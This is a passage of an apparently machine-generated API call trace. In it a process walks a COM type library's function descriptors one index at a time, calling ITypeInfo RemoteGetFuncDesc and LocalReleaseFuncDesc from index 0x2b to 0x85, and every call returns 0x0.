[0060.229] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.229] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x30, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x31, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x32, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x33, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x34, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x35, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x36, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x37, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x38, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x39, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.230] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x40, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x41, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x42, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x43, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x44, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x45, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x46, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x47, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x48, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x49, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x50, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x51, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.231] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x52, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.231] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x53, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x54, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x55, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x56, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x57, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x58, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x59, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x60, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x61, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x62, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x63, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.232] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.232] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x64, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x65, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x66, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x67, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x68, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x69, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x70, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x71, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x72, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.233] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x73, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x74, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x75, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x76, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x77, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x78, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x79, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7a, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7b, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7c, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7d, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7e, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7f, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x80, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x81, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x82, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x83, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x84, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x85, ppFuncDesc=0x33e4fb6cc8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6cc8, pDummy=0x6) returned 0x0 [0060.234] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) 